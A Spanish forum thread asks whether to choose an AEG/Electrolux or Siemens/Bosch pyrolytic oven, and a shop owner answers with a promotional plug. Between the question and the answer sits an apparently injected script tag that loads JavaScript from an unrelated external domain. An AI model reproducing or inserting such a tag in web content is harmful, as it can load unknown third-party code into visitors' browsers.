Horno pirolitico AEG o Siemens

Voy a comprar un horno pirolitico. Se me plantean varias dudas.

1- Para características similares entre grupo AEG-Electrolux y Siemens-Bosch ¿Con cuál te quedarías?

2- Para precio similar AEG me ofrece menos consumo y mas capacidad y Siemens mas diseño. Dado esto ¿debería decantarme por AEG?

3- Entre AEG y Electrolux este último resulta algo más económico. ¿Dado qué pertenecen al mismo grupo me podrías indicar si hay diferencia de calidad entre ellos?

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>

1 Respuesta

Respuesta

Alfa 115, entre AEG - Electrolux o entre Siemens-Bosch puedes escoger el que estéticamente más te guste o te favorezca en precio ya que a igualdad de categoría son los mismos componentes. Entre grupo AEG o grupo Bosch, te puedo decir que ambos son de muy buena calidad y volvemos al mismo punto, quédate el que estéticamente te agrade más o el que te ofrezca un mejor precio en el momento de la compra, en cuanto a los consumos, no debes obsesionarte con ello pues son muy similares y si afinamos con décimas del fabricante luego se ve muy alterados con los hábitos del usuario, otra cosa es que compares entre distintos grupos de eficiencia energética.

Si aún no lo ha comprado y lo estima oportuno puede visitar mi tienda online de venta de electrodomésticos donde encontrará una gran oferta en hornos a precios muy interesantes, no olvide que Balay es del grupo Bosch-Siemens y en ocasiones los puede encontrar a precios sensiblemente más bajos.

Electrodomésticos baratos al mejor precio con atención personalizada